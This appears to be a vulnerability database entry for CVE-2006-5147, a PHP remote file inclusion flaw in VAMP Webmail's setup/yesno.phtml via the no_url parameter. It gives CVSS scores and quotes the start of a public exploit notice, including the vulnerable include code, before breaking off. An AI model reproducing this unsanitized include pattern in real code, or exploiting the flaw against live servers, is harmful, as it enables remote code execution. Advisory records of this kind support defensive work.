7.5
CVSSv2

CVE-2006-5147

Published: 05/10/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

PHP remote file inclusion vulnerability in wamp_dir/setup/yesno.phtml in VAMP Webmail 2.0beta1 and previous versions allows remote malicious users to execute arbitrary PHP code via a URL in the no_url parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

vamp webmail vamp webmail

Exploits

###### ToXiC ######################### # #VAMP Webmail Remote File Inclusion by ToXiC CreW # #BuG FounD by Drago84 # #Application Affect:VAMP Webmail # #Page: # yesnophtml #Dir : # /setup/ # #Problem: # <?if($answer=="Yes") { # include $yes_url; # } else { # include $no_url; # }?> # ExPloit : #ht ...